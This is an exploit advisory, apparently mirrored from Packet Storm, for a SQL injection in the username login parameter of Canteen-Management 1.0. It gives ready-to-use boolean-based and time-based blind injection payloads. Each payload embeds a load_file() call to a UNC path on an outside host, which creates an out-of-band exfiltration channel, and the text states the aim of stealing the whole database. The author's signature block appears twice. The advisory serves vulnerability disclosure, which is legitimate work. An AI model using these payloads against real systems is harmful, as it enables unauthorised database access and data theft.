Share
## https://sploitus.com/exploit?id=PACKETSTORM:168608
## Title: Canteen-Management1.0-2022 SQLi  
## Author: nu11secur1ty  
## Date: 10.04.2022  
## Vendor: https://www.mayurik.com/  
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi  
  
## Description:  
The username parameter from Canteen-Management1.0-2022 appears to be  
vulnerable to SQL injection attacks.  
The malicious user can attack remotely this system by using this  
vulnerability to steal all information from the database of this  
system.  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
  
```mysql  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: username=UvIiDwEB'+(select  
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''  
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=UvIiDwEB'+(select  
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''  
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND  
'awEr'='awEr&password=h5F!l8j!Y6&login=  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)  
  
## Proof and Exploit:  
[href](https://streamable.com/vvz2lh)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at  
https://packetstormsecurity.com/https://cve.mitre.org/index.html and  
https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>